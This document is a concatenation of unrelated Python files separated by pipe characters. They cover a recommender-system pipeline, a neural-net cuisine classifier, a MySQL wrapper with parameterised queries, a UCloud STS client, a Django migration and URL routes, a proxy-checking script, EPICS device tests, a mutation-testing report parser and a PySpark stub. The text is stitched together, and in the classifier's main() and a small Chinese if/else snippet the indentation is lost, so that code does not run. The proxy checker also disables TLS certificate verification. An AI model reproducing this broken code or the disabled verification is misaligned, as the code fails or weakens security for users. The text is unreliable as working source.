    `n_predictions` items per user, and return a binary URM containing the
    original interactions plus the predicted ones.
    """
    if load_matrix:
        # reuse a previously-saved similarity matrix instead of refitting
        rec.W_sparse = ut.load_sparse_matrix(filename, 'csc', np.float32)
    else:
        rec.fit(urm_original_fit, icm)
        ut.save_sparse_matrix(rec.W_sparse, filename)
    ranks = rec.predict(urm_original_pred, n_predictions, non_active_items_mask)
    ranks = np.array(ranks).flatten()
    data = np.ones(ranks.shape[0])
    cols = ranks.copy()
    # each user contributes exactly n_predictions recommended item columns
    rows = np.repeat(range(urm_original_fit.shape[0]),n_predictions)
    urm_enriched = sps.csr_matrix((data, (rows,cols)), urm_original_fit.shape)
    # keep every pre-existing interaction as an implicit 1 as well
    urm_enriched[urm_original_fit != 0] = 1
    return urm_enriched
def main():
    """Iteratively enrich the URM with fSLIM predictions over four phases,
    then write the final top-5 recommendations for the target users.

    Python 2 code; each phase reuses produce_enriched_urm with a fixed
    alpha (the commented-out cv_search calls were used to pick it).
    """
    urm_explicit = ut.read_interactions()
    # binarised copy of the ratings matrix
    urm_implicit = urm_explicit.copy()
    urm_implicit[urm_explicit > 0] = 1
    items_dataframe = ut.read_items()
    icm = ut.generate_icm(items_dataframe)
    icm = ut.normalize_matrix(icm, row_wise=True)
    item_ids = items_dataframe.id.values
    actives = np.array(items_dataframe.active_during_test.values)
    non_active_items_mask = actives == 0
    test_users_idx = pd.read_csv('../../inputs/target_users_idx.csv')['user_idx'].values
    urm_pred = urm_explicit[test_users_idx, :]
    # top-popular items restricted to those active during the test period
    top_rec = TopPop(count=True)
    top_rec.fit(urm_implicit)
    top_pops = top_rec.top_pop[non_active_items_mask[top_rec.top_pop] == False]
    # ----------------------------- FIRST PHASE ---------------------------------
    fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
                                   similarity='CB', aa_sh=2000, alpha_ridge=100000)
    urm_enriched = produce_enriched_urm(fslim, icm, urm_implicit, urm_explicit, 2, non_active_items_mask, True, "fSLIM 30000knn 100000alpha 2000sh CBsim ratings1")
    # ----------------------------- SECOND PHASE ---------------------------------
    fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
                                   similarity='CB', aa_sh=2000)
    #cv_search(fslim, urm_expl=urm_explicit, urm_impl=urm_enriched, icm=icm, non_active_items_mask=non_active_items_mask,
    #          sample_size=10000, filename='fSLIM (Ridge) CV MAP values enriched phase 2')
    # TODO: select best alpha
    fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
                                   similarity='CB', aa_sh=2000, alpha_ridge=100000)
    urm_enriched = produce_enriched_urm(fslim, icm, urm_enriched, urm_explicit, 2, non_active_items_mask, False,
                                        "fSLIM 30000knn 100000alpha 2000sh CBsim ratings1+2 enriched phase 2")
    # ----------------------------- THIRD PHASE ---------------------------------
    fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
                                   similarity='CB', aa_sh=2000)
    #cv_search(fslim, urm_expl=urm_explicit, urm_impl=urm_enriched, icm=icm, non_active_items_mask=non_active_items_mask,
    #          sample_size=10000, filename='fSLIM (Ridge) CV MAP values enriched phase 3')
    # TODO: select best alpha
    fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
                                   similarity='CB', aa_sh=2000, alpha_ridge=100000)
    urm_enriched = produce_enriched_urm(fslim, icm, urm_enriched, urm_explicit, 1, non_active_items_mask, False,
                                        "fSLIM 30000knn 100000alpha 2000sh CBsim ratings1+4 enriched phase 3")
    # ----------------------------- FOURTH PHASE ---------------------------------
    fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
                                   similarity='CB', aa_sh=2000)
    # cv_search(fslim, urm_expl=urm_explicit, urm_impl=urm_enriched, icm=icm, non_active_items_mask=non_active_items_mask,
    #           sample_size=10000, filename='fSLIM (Ridge) CV MAP values enriched phase 4 (final)')
    # TODO: select best alpha
    fslim = IfSL.fSLIM_recommender(top_pops=top_pops, pred_batch_size=1000, sim_partition_size=1000, k_nn=30000,
                                   similarity='CB', aa_sh=2000, alpha_ridge=100000)
    # final fit on the fully-enriched URM; predictions go straight to disk
    fslim.fit(urm_enriched, icm)
    ut.save_sparse_matrix(fslim.W_sparse, "fSLIM 30000knn 100000alpha 2000sh CBsim ratings1+5 enriched phase 4")
    ranks = fslim.predict(urm_pred, 5, non_active_items_mask)
    ut.write_recommendations("HybridPipeline fSLIM 30000k 100000alpha 2000sh implrating CBsim x4", ranks, test_users_idx, item_ids)
    '''scm = ISC.Item_SCM(top_pops=top_pops, pred_batch_size=1000, C_SVM=0.01)
    # scm.fit(urm_enriched)
    # save_sparse_matrix(scm.W_sparse, "SCM SVM enriched 1minus2C ratings1")
    scm.W_sparse = load_sparse_matrix("SCM SVM enriched 1minus2C ratings1", 'csc', np.float32)
    ranking_scm = scm.predict(urm_implicit[test_users_idx,:], 5, non_active_items_mask)
    ut.write_recommendations("HybridPipeline fSLIM 30000k 100000alpha 2000sh implrating CBsim SCM SVM 1minus2 impllpred", ranking_scm, test_users_idx, item_ids)
    # fslim.fit(urm_enriched, icm)
    # save_sparse_matrix(fslim.W_sparse, "fSLIM 30000knn 100000alpha 2000sh CBsim ratings1 enriched")
    fslim.W_sparse = load_sparse_matrix("fSLIM 30000knn 100000alpha 2000sh CBsim ratings1 enriched", 'csc', np.float64)
    ranking_fslim_enriched = fslim.predict(urm_pred, 5, non_active_items_mask)
    ut.write_recommendations("HybridPipeline fSLIM 30000k 100000alpha 2000sh implrating CBsim x2", ranking_fslim_enriched, test_users_idx, item_ids)'''
main() |
import numpy as np
from sknn.mlp import Classifier, Layer
from sknn.platform import gpu32
import sys
import logging
import pickle
import argparse
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import classification_report
import matplotlib.pyplot as plt
import csv
# Command-line interface: 'train' fits the grid search, 'predict' writes
# test.csv; --loadfile resumes from a pickled GridSearchCV.
parser = argparse.ArgumentParser(description='Train network.')
parser.add_argument('action', metavar='N', type=str,
                    help='[train, predict]')
parser.add_argument('--loadfile', dest='loadfile', action='store',
                    type=str,
                    help='pkl file to load.')
args = parser.parse_args()
# Cuisine name -> integer class label used during training.
class_mapper = {'irish': 0, 'mexican': 1, 'chinese': 2,
                'filipino': 3, 'vietnamese': 4, 'spanish': 13, 'japanese': 7,
                'moroccan': 5, 'french': 12, 'greek': 9, 'indian': 10,
                'jamaican': 11, 'british': 8, 'brazilian': 6, 'russian':
                14, 'cajun_creole': 15, 'thai': 16, 'southern_us': 17,
                'korean': 18, 'italian': 19}
# invert the mapping: integer class label -> cuisine name (for predictions)
class_mapper = dict(zip(class_mapper.values(), class_mapper.keys()))
def main():
NUMPY_INPUT_FILE_TEST = 'nn_test.npy'
NUMPY_INPUT_FILE = 'nn_train_39774.npy'
#NUMPY_INPUT_FILE = 'nn_train_140000.npy'
logging.basicConfig(
format="%(message)s",
level=logging.DEBUG,
stream=sys.stdout)
data = np.load(NUMPY_INPUT_FILE)
data_test = np.load(NUMPY_INPUT_FILE_TEST)
print "Total Train Samples %d" % len(data.transpose())
print "Total Test Samples %d" % len(data_test.transpose())
uid, y_train, X_train = data[
0,:].transpose(), data[1,:].transpose(), data[2:,:].transpose()
uid_test, X_test = data_test[
0,:].transpose(), data_test[1:,:].transpose()
train_index = int(X_train.shape[0] * .8)
print "Using %d samples to train" % train_index
# X_train, y_train, X_valid, y_valid = X_train[:train_index],
# y_train[:train_index], X_train[train_index:], y_train[train_index:]
# The most basic method of hyper paramater search
# learning reate, batch size
nn = Classifier(
layers=[
Layer("Maxout", units=450, pieces=2), # ,dropout=.1),
# Layer("Tanh",units=300),#,dropout=.1),
Layer("Softmax")],
learning_rate=0.1,
# weight_decay=.0001,
dropout_rate=.05,
# random_state= ,
learning_momentum=.5,
valid_size=.2,
batch_size=100,
n_stable=5,
f_stable=.001,
# valid_set=(X_valid,y_valid),
n_iter=60)
if args.loadfile:
gs = pickle.load(open(args.loadfile, 'rb'))
else:
gs = GridSearchCV(nn, cv=3, scoring='accuracy', param_grid={
'hidden0__units': [450,600],
#'hidden0__units': [150,300,450],
'hidden0__type': ["Maxout"],
'hidden0__pieces': [2],
'learning_rate': [0.05],
'batch_size': [100],
'dropout_rate': [.05]})
if args.action == 'train':
try:
gs.fit(X_train, y_train)
#nn.fit(X_train, y_train)
print gs.grid_scores_
print gs.best_score_
print gs.best_params_
nn_filename = 'nnout/nn_%s.pkl' % 1001
gs_filename = 'nnout/gs_%s.pkl' % 1001
pickle.dump(nn, open(gs_filename, 'wb'))
pickle.dump(gs, open(nn_filename, 'wb'))
print "Saving %s" % nn_filename
print "Saving %s" % gs_filename
except KeyboardInterrupt:
pickle.dump(gs, open('gs_temp.pkl', 'wb'))
pickle.dump(nn, open('nnout/nn_%s.pkl' % 'trained', 'wb'))
pass
elif args.action == 'predict':
y_pred = gs.predict(X_test)
y_pred_mapped = [class_mapper[y] for y in y_pred.flat]
results = np.append([uid_test.astype(str)], [y_pred_mapped], axis=0)
print "Saving test.csv"
np.savetxt("test.csv", results.transpose(), "%s,%s", header="id,cuisine")
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import MySQLdb
class PyMysql:
    """Thin MySQLdb wrapper for the blueprint and hostmapping tables.

    Each public method opens a fresh connection, executes one statement,
    commits when needed and closes the connection again.

    FIX(review): the original built every SQL statement by %-interpolating
    caller-supplied strings, which is SQL-injectable (the values come from
    the REST frontend). All statements now use DB-API parameter binding,
    so the driver quotes/escapes the values; the ad-hoc
    MySQLdb.escape_string call is no longer needed.
    """
    conn = None
    cur = None

    def __init__(self, host='localhost', user='root', passwd='root',
                 db='bprest', port=3306):
        self.host = host
        self.user = user
        self.passwd = passwd
        self.db = db
        self.port = port

    def __open(self):
        # Open a new connection + cursor; errors are printed, not raised.
        try:
            self.conn = MySQLdb.connect(db=self.db, user=self.user,
                                        passwd=self.passwd,
                                        host=self.host, port=self.port)
            self.cur = self.conn.cursor()
        except MySQLdb.Error as e:
            print("Error %d: %s" % (e.args[0], e.args[1]))

    def __close(self):
        self.cur.close()
        self.conn.close()

    """
    about blueprint
    """
    def mysql_insert_one_blueprint(self, name, components, rolename, content):
        """Insert one blueprint row; returns {"result": <new row id>}."""
        self.__open()
        self.cur.execute(
            "INSERT INTO blueprint (name, components, rolename, content) "
            "VALUES (%s, %s, %s, %s)",
            (name, components, rolename, content))
        rowid = self.conn.insert_id()
        self.conn.commit()
        self.__close()
        return {"result": rowid}

    def mysql_search_blueprint(self):
        """Return every blueprint row as a list of field dicts."""
        fields = ["id", "name", "content", "rolename", "components", "release_file", "release_time"]
        result = []
        sql = "SELECT " + ', '.join(fields) + " FROM blueprint;"
        self.__open()
        self.cur.execute(sql)
        rows = self.cur.fetchall()
        if rows:
            for line in rows:
                result.append(dict(zip(tuple(fields), line)))
        self.__close()
        return {"result": result}

    def mysql_search_one_blueprint(self, id):
        """Return one blueprint as a field dict ({} when id is unknown).

        NOTE(review): the original early return (kept here) leaves the
        connection open when the id does not exist.
        """
        t = {}
        fields = ["id", "name", "components", "rolename", "content", "release_file", "release_time"]
        self.__open()
        rows = self.cur.execute(
            "SELECT " + ', '.join(fields) + " FROM blueprint WHERE id=%s;",
            (id,))
        if rows == 0:
            return {"result": t}
        row = self.cur.fetchone()
        if row:
            t = dict(zip(tuple(fields), row))
        self.__close()
        return {"result": t}

    def mysql_check_blueprint_byname(self, name):
        """Return {"result": 1} when a blueprint named `name` exists, else 0."""
        self.__open()
        rows = self.cur.execute("SELECT * FROM blueprint WHERE name=%s;", (name,))
        t = 1 if rows > 0 else 0
        self.__close()
        return {"result": t}

    def mysql_delete_one_blueprint(self, id):
        """Delete the blueprint row with this id."""
        self.__open()
        self.cur.execute("DELETE FROM blueprint WHERE id=%s;", (id,))
        self.conn.commit()
        self.__close()
        return {"result": id}

    def mysql_update_one_blueprint(self, id, name, components, rolename, content):
        """Update all editable columns of one blueprint row."""
        self.__open()
        self.cur.execute(
            "UPDATE blueprint SET name=%s, components=%s, rolename=%s, "
            "content=%s WHERE id=%s",
            (name, components, rolename, content, id))
        self.conn.commit()
        self.__close()
        return {"result": id}

    def mysql_release_one_blueprint(self, id, release_file, release_time):
        """Set — or clear, when either value is falsy — the release columns."""
        self.__open()
        if release_time and release_file:
            self.cur.execute(
                "UPDATE blueprint SET release_file=%s, release_time=%s WHERE id=%s",
                (release_file, release_time, id))
        else:
            self.cur.execute(
                "UPDATE blueprint SET release_file=NULL, release_time=NULL WHERE id=%s",
                (id,))
        self.conn.commit()
        self.__close()
        return id

    """
    about hostmapping
    """
    def mysql_insert_one_hostmapping(self, rolename, content):
        """Insert one hostmapping row; returns {"result": <new row id>}."""
        self.__open()
        self.cur.execute(
            "INSERT INTO hostmapping (rolename, content) VALUES (%s, %s)",
            (rolename, content))
        rowid = self.conn.insert_id()
        self.conn.commit()
        self.__close()
        return {"result": rowid}

    def mysql_search_hostmapping(self):
        """Return every hostmapping row as a list of field dicts."""
        fields = ["id", "rolename", "content", "release_file", "release_time"]
        result = []
        sql = "SELECT " + ', '.join(fields) + " FROM hostmapping;"
        self.__open()
        self.cur.execute(sql)
        rows = self.cur.fetchall()
        if rows:
            for line in rows:
                result.append(dict(zip(tuple(fields), line)))
        self.__close()
        return {"result": result}

    def mysql_search_one_hostmapping(self, id):
        """Return one hostmapping as a field dict ({} when id is unknown).

        NOTE(review): same early-return/open-connection caveat as the
        blueprint variant.
        """
        t = {}
        fields = ["id", "rolename", "content", "release_file", "release_time"]
        self.__open()
        rows = self.cur.execute(
            "SELECT " + ', '.join(fields) + " FROM hostmapping WHERE id=%s;",
            (id,))
        if rows == 0:
            return {"result": t}
        row = self.cur.fetchone()
        if row:
            t = dict(zip(tuple(fields), row))
        self.__close()
        return {"result": t}

    def mysql_check_hostmapping_byname(self, name):
        """Return {"result": 1} when a hostmapping with this rolename exists."""
        self.__open()
        rows = self.cur.execute("SELECT * FROM hostmapping WHERE rolename=%s;", (name,))
        t = 1 if rows > 0 else 0
        self.__close()
        return {"result": t}

    def mysql_delete_one_hostmapping(self, id):
        """Delete the hostmapping row with this id."""
        self.__open()
        self.cur.execute("DELETE FROM hostmapping WHERE id=%s;", (id,))
        self.conn.commit()
        self.__close()
        return {"result": id}

    def mysql_update_one_hostmapping(self, id, rolename, content):
        """Update the editable columns of one hostmapping row."""
        self.__open()
        self.cur.execute(
            "UPDATE hostmapping SET rolename=%s, content=%s WHERE id=%s",
            (rolename, content, id))
        self.conn.commit()
        self.__close()
        return {"result": id}

    def mysql_release_one_hostmapping(self, id, release_file, release_time):
        """Set — or clear, when either value is falsy — the release columns."""
        self.__open()
        if release_time and release_file:
            self.cur.execute(
                "UPDATE hostmapping SET release_file=%s, release_time=%s WHERE id=%s",
                (release_file, release_time, id))
        else:
            self.cur.execute(
                "UPDATE hostmapping SET release_file=NULL, release_time=NULL WHERE id=%s",
                (id,))
        self.conn.commit()
        self.__close()
        return id
|
""" Code is generated by ucloud-model, DO NOT EDIT IT. """
import typing
from ucloud.core.client import Client
from ucloud.services.sts.schemas import apis
class STSClient(Client):
    def __init__(
        self, config: dict, transport=None, middleware=None, logger=None
    ):
        super(STSClient, self).__init__(config, transport, middleware, logger)
    def assume_role(self, req: typing.Optional[dict] = None, **kwargs) -> dict:
        """AssumeRole - obtain temporary credentials for assuming a RAM role
        **Request**
        - **RoleSessionName** (str) - (Required) Name of the role session.
        - **RoleUrn** (str) - (Required) URN of the RAM role to assume.
        - **DurationSeconds** (int) - Validity period of the token.
        - **Policy** (str) - Extra policy attached to the STS token to further restrict its permissions.
        **Response**
        - **Credentials** (dict) - see the **Credentials** model definition
        **Response Model**
        **Credentials**
        - **AccessKeyId** (str) - Access key ID.
        - **AccessKeySecret** (str) - Access key secret.
        - **Expiration** (str) - Expiry time of the token (UTC).
        - **SecurityToken** (str) - Security token.
        """
        # build request
        d = {}
        # merge the caller-supplied fields, tolerating req=None
        req and d.update(req)
        d = apis.AssumeRoleRequestSchema().dumps(d)
        resp = self.invoke("AssumeRole", d, **kwargs)
        return apis.AssumeRoleResponseSchema().loads(resp)
|
# Generated by Django 2.1.3 on 2018-11-30 03:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the airline_info app: AirPlane, AirPort,
    Flight_captain, From_to and Time_line; the foreign keys are attached
    via AddField after all models are created."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='AirPlane',
            fields=[
                ('Airline', models.CharField(max_length=30)),
                ('AirPlane_code', models.CharField(max_length=20, primary_key=True, serialize=False, unique=True)),
                ('Num_of_seat', models.IntegerField()),
                ('Made_by_Company', models.CharField(max_length=100)),
                ('Maintenance_Day', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='AirPort',
            fields=[
                ('Ap_Code', models.CharField(max_length=100, primary_key=True, serialize=False, unique=True)),
                ('Terminal', models.CharField(max_length=100)),
                ('Gate', models.CharField(max_length=100)),
                ('Status', models.CharField(max_length=100)),
                ('Airplain_code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='airline_info.AirPlane')),
            ],
        ),
        migrations.CreateModel(
            name='Flight_captain',
            fields=[
                ('First_name', models.CharField(max_length=100)),
                ('Second_name', models.CharField(max_length=100)),
                ('Birthday', models.DateField()),
                ('home_address', models.CharField(max_length=100)),
                ('ssn', models.IntegerField()),
                ('C_code', models.CharField(max_length=100, primary_key=True, serialize=False, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='From_to',
            fields=[
                ('F_T_id', models.IntegerField(primary_key=True, serialize=False, unique=True)),
                ('Departure_loc', models.CharField(max_length=100)),
                ('Arrival_loc', models.CharField(max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='Time_line',
            fields=[
                ('T_id', models.IntegerField(primary_key=True, serialize=False, unique=True)),
                ('Departure_time', models.DateField()),
                ('Arrival_time', models.DateField()),
            ],
        ),
        # Foreign keys added separately, after the referenced models exist.
        migrations.AddField(
            model_name='airport',
            name='FTID',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='airline_info.From_to'),
        ),
        migrations.AddField(
            model_name='airport',
            name='TID',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='airline_info.Time_line'),
        ),
        migrations.AddField(
            model_name='airplane',
            name='Captain_code',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='airline_info.Flight_captain'),
        ),
    ]
|
# -*- coding:utf-8 -*-
x = "abc"
if x == "abc":
print("x and abc 是相等的")
else:
print("x and abc 是不相等的")
|
import json
import requests
import herogetAgent
requests.packages.urllib3.disable_warnings()
def main():
    """Validate each stored proxy by fetching a known URL through it; the
    proxies that respond with HTTP 200 are saved to proxiespool2.json."""
    # validation target (despite the variable name, it is sohu.com)
    baidu = "https://www.sohu.com/"
    use_ip_proxy = []
    ip_proxy_path = "./jsonfile/proxyipdata3.json"
    # load the candidate proxy entries
    ip_proxy_datas = json.load(open(ip_proxy_path,"r"))
    # print(ip_proxy_datas)
    # iterate over the proxy entries
    try:
        for ip_element in ip_proxy_datas:
            # fetch through the proxy with a randomised User-Agent;
            # TLS verification is disabled for the proxied request
            # print(http_element)
            # print("开始验证 %s" % ip_element)
            ip_response = requests.get(baidu,
                                       headers=herogetAgent.get_header(),
                                       proxies=ip_element,
                                       verify=False
                                       )
            # time.sleep(2 + randint(1,4))
            # print(ip_response.status_code)
            if ip_response.status_code == 200:
                print("--%s->ip地址请求成功" % ip_element)
                use_ip_proxy.append(ip_element)
                # rewrite the whole pool file after every success
                json.dump(use_ip_proxy,
                          open("./jsonfile/proxiespool2.json", "w"),
                          indent=2)
            else:
                # print("--%s->ip地址请求失败" % http_element)
                continue
        print("----------------------------->验证完成!!")
    except Exception as e:
        # NOTE(review): one failed proxy aborts the whole loop here
        print(e)
# Script entry point.
if __name__ == '__main__':
    main()
|
from django.urls import path
from . import views
from django.views.decorators.csrf import csrf_exempt
# URL routes for the data API.
# FIX(review): the original called views.FillData().as_view() — i.e. as_view
# on an INSTANCE. Django's View.as_view is a classonlymethod, so instance
# access raises AttributeError at import time; it must be called on the
# class itself.
urlpatterns = [
    path('filldata', views.FillData.as_view(), name = 'filldata'),
    path('deldata', views.DelData.as_view(), name = 'deldata'),
    path('getjson', views.GetJson.as_view(), name = 'getjson'),
]
import os
import unittest
from parameterized import parameterized
from utils.emulator_launcher import CommandLineEmulatorLauncher
from utils.test_modes import TestModes
from utils.channel_access import ChannelAccess
from utils.ioc_launcher import get_default_ioc_dir, EPICS_TOP
from utils.testing import get_running_lewis_and_ioc, parameterized_list, skip_if_recsim
# Device prefix
DEVICE_PREFIX = "MEZFLIPR_01"
EMULATOR_NAME = "mezflipr"
# IOC under test, run against the mezflipr emulator speaking protocol v2.
IOCS = [
    {
        "name": DEVICE_PREFIX,
        "directory": get_default_ioc_dir("MEZFLIPR"),
        "emulator": EMULATOR_NAME,
        "macros": {
            "PROTOCOL_VERSION": "2"
        }
    },
]
TEST_MODES = [TestModes.RECSIM, TestModes.DEVSIM]
# Currently only one flipper but they may add more in a future iteration of the program
flipper = "FLIPPER"
class MezfliprTests(unittest.TestCase):
    """System tests for the MEZFLIPR IOC.

    Runs against the lewis emulator in DEVSIM and the record simulation in
    RECSIM; tests that need real device state are skipped in RECSIM.
    """
    def setUp(self):
        # Requires the emulator/IOC pair from IOCS to already be running.
        self._lewis, self._ioc = get_running_lewis_and_ioc(EMULATOR_NAME, DEVICE_PREFIX)
        self.ca = ChannelAccess(device_prefix=DEVICE_PREFIX, default_timeout=30)
    def test_WHEN_ioc_is_started_THEN_ioc_is_not_disabled(self):
        self.ca.assert_that_pv_is("DISABLE", "COMMS ENABLED")
    @parameterized.expand(parameterized_list(["On", "Off"]))
    def test_GIVEN_power_is_set_THEN_can_be_read_back(self, _, state):
        self.ca.assert_setting_setpoint_sets_readback(state, readback_pv="{}:POWER".format(flipper))
    @parameterized.expand(parameterized_list([0., 0.12, 5000.5]))
    def test_GIVEN_compensation_is_set_THEN_compensation_can_be_read_back(self, _, compensation):
        self.ca.assert_setting_setpoint_sets_readback(compensation, readback_pv="{}:COMPENSATION".format(flipper))
    def _assert_mode(self, mode):
        # Helper: MODE PV holds `mode` and is not in alarm.
        self.ca.assert_that_pv_is("{}:MODE".format(flipper), mode)
        self.ca.assert_that_pv_alarm_is("{}:MODE".format(flipper), self.ca.Alarms.NONE)
    def _assert_params(self, param):
        # Helper: PARAMS PV (ignoring trailing whitespace) equals `param`.
        self.ca.assert_that_pv_value_causes_func_to_return_true("{}:PARAMS".format(flipper),
                                                                lambda val: val is not None and val.rstrip() == param)
        self.ca.assert_that_pv_alarm_is("{}:PARAMS".format(flipper), self.ca.Alarms.NONE)
    @skip_if_recsim("State of device not simulated in recsim")
    def test_WHEN_constant_current_mode_set_THEN_parameters_reflected_and_mode_is_constant_current(self):
        param = 25
        self.ca.set_pv_value("{}:CURRENT:SP".format(flipper), param)
        self._assert_params("{:.1f}".format(param))
        self._assert_mode("static")
    @skip_if_recsim("State of device not simulated in recsim")
    def test_WHEN_steps_mode_set_THEN_parameters_reflected_and_mode_is_steps(self):
        param = "[some, random, list, of, data]"
        self.ca.set_pv_value("{}:CURRENT_STEPS:SP".format(flipper), param)
        self._assert_params(param)
        self._assert_mode("steps")
    @skip_if_recsim("State of device not simulated in recsim")
    def test_WHEN_analytical_mode_set_THEN_parameters_reflected_and_mode_is_analytical(self):
        # Deliberately longer than 40 characters to exercise long-string readback.
        param = "a long string of parameters which is longer than 40 characters"
        self.ca.set_pv_value("{}:CURRENT_ANALYTICAL:SP".format(flipper), param)
        self._assert_params(param)
        self._assert_mode("analytical")
    @skip_if_recsim("State of device not simulated in recsim")
    def test_WHEN_file_mode_set_THEN_parameters_reflected_and_mode_is_file(self):
        param = r"C:\some\file\path\to\a\file\in\a\really\deep\directory\structure\with\path\longer\than\40\characters"
        self.ca.set_pv_value("{}:FILENAME:SP".format(flipper), param)
        self._assert_params(param)
        self._assert_mode("file")
    @parameterized.expand(parameterized_list(["MODE", "COMPENSATION", "PARAMS"]))
    @skip_if_recsim("Recsim cannot test disconnected device")
    def test_WHEN_device_is_disconnected_THEN_pvs_are_in_invalid_alarm(self, _, pv):
        self.ca.assert_that_pv_alarm_is("{}:{}".format(flipper, pv), self.ca.Alarms.NONE)
        with self._lewis.backdoor_simulate_disconnected_device():
            self.ca.assert_that_pv_alarm_is("{}:{}".format(flipper, pv), self.ca.Alarms.INVALID)
        # Assert alarms clear on reconnection
        self.ca.assert_that_pv_alarm_is("{}:{}".format(flipper, pv), self.ca.Alarms.NONE)
|
import pyaudio
# Audio-capture configuration shared by the recorder.
cache = "cache/"  # directory recorded clips are written to
rate = 44100  # sample rate in Hz
channels = 1  # mono capture
format = pyaudio.paInt16  # 16-bit signed samples; NOTE(review): name shadows builtin format()
chunk = 1024  # frames per buffer read
rec_seconds = 5  # duration of one recording
import json
import os
from collections import defaultdict
from src import model
class MutantOperator:
    """Registry-backed description of one mutation operator.

    Every instance registers itself in the class-level ``operators`` map
    under its name so it can be retrieved later via :meth:`find_by_name`.
    Registering two operators with the same name raises ``ValueError``.
    """

    operators = {}

    @classmethod
    def reset_operators(cls):
        """Start a fresh, empty operator registry."""
        cls.operators = {}

    def __init__(self, adict):
        self.name: str = adict["name"]
        self.description: str = adict["description"]
        existing = self.operators.get(self.name)
        if existing is not None:
            raise ValueError(
                f"Found duplicate operator name! "
                f"{self.name} found, but got already {existing}"
            )
        self.operators[self.name] = self

    @classmethod
    def find_by_name(cls, name: str):
        """Return the registered operator called *name* (KeyError if absent)."""
        return cls.operators[name]

    def __repr__(self):
        return f"MutantOperator(name={self.name}, description={self.description})"
class Mutant(model.Mutant):
    """A mutant parsed from the tool's JSON report.

    Mutants sharing the same (line, operator) pair are disambiguated by a
    class-wide counter so their ``hash_tuple`` values stay unique.
    NOTE(review): ``original_line`` used in __str__ is inherited from
    model.Mutant — confirm its semantics there.
    """

    # Maps (line, operator-name) -> number of mutants already seen there.
    counter = defaultdict(int)

    @classmethod
    def reset_counter(cls):
        """Forget all per-(line, operator) counts (call per report run)."""
        cls.counter = defaultdict(int)

    @property
    def hash_tuple(self) -> tuple:
        # (line, operator-name, disambiguating count)
        return self._hash_tuple + (self._count,)

    @property
    def _hash_tuple(self) -> tuple:
        return self.line, self.operator.name

    def __init__(self, adict):
        lines = adict["lines"]
        operators = adict["operators"]
        points = adict["points"]
        # The report format allows lists, but this parser supports exactly
        # one line/operator/points entry per mutant.
        assert all(len(thelist) == 1 for thelist in (lines, operators, points))
        line, operator, points = lines[0], operators[0], points[0]
        super().__init__(line=int(line))
        self.points: int = points
        self.operator = MutantOperator.find_by_name(operator)
        # fix different mutations but with same line
        # and description with a counter.
        # BUGFIX: key the counter on the tuple itself; the original used
        # hash(self._hash_tuple) as the dict key, so two distinct
        # (line, operator) pairs with colliding hashes would share a count.
        key = self._hash_tuple
        self._count = Mutant.counter[key]
        Mutant.counter[key] += 1

    def __str__(self):
        # Mention the pre-shift line number only when it differs.
        if self.original_line != self.line:
            s = f" (original: {self.original_line})"
        else:
            s = ""
        s = f"Mutant at line {self.line}{s} with"
        s += f" {self.points} points and"
        s += f" operator {self.operator}"
        return s
class Report(model.Report):
    """Mutation-testing report for a single class, parsed from the tool's
    JSON result file via :meth:`makeit`."""
    def __init__(self, result_fp: "str | os.PathLike", classname: str):
        # (annotation fixed: the original `[str, os.PathLike]` was a list
        # literal, not a valid type; a union is what was meant)
        self.result_fp = result_fp
        self.classname = classname
        # The fields below are populated by makeit().
        self.operators = None
        self.name = None
        self.total_mutants_count = None
        self.killed_mutants_count = None
        self.live_mutants_count = None
        self.live_mutants = None
    def makeit(self):
        """Load the JSON file and fill in all per-class statistics.

        Raises ValueError when `classname` is absent from the report or
        appears more than once.
        """
        # reset counter when we create the report
        Mutant.reset_counter()
        with open(self.result_fp) as f:
            result = json.load(f)
        # instantiate operators to use them in Mutants
        self.operators = [MutantOperator(adict) for adict in result["operators"]]
        classdict = [
            thedict
            for thedict in result["classes"]
            if self.classname == thedict["name"]
        ]
        if not classdict:
            raise ValueError(
                f"{self.classname} not found in classes; file: {self.result_fp}"
            )
        elif len(classdict) > 1:
            raise ValueError(f"{self.classname} found 2+ times; file: {self.result_fp}")
        else:
            classdict = classdict[0]
        self.name = classdict["name"]
        self.total_mutants_count = classdict["mutantsCount"]
        self.killed_mutants_count = classdict["mutantsKilledCount"]
        self.live_mutants_count = self.total_mutants_count - self.killed_mutants_count
        self.live_mutants = [Mutant(mdict) for mdict in classdict["notKilledMutant"]]
        # at the end of execution, reset mutant operator dictionary
        MutantOperator.reset_operators()
    def get_live_mutants(self):
        return self.live_mutants
    def get_killed_mutants(self):
        # The report only lists surviving mutants; killed ones are not kept.
        return []
    def get_killed_mutants_count(self):
        return self.killed_mutants_count
    def get_mutants_count(self):
        return self.total_mutants_count
    def __repr__(self):
        s = f"CLASS {self.name}\n"
        s += f"Total mutants: {self.total_mutants_count} -> "
        s += f"Killed: {self.killed_mutants_count}, Live: {self.live_mutants_count}"
        if self.live_mutants_count > 0:
            s += "\nLIVE MUTANTS:\n"
            s += "\n".join(
                repr(mutant)
                for mutant in sorted(self.live_mutants, key=lambda x: x.line)
            )
        return s
|
from pyspark.sql import SparkSession
from pyspark.sql import Row
from pyspark.sql import functions as func
# One Spark session per script; appName labels it in the Spark UI.
spark = SparkSession.builder.appName("FriendsByAge").getOrCreate()
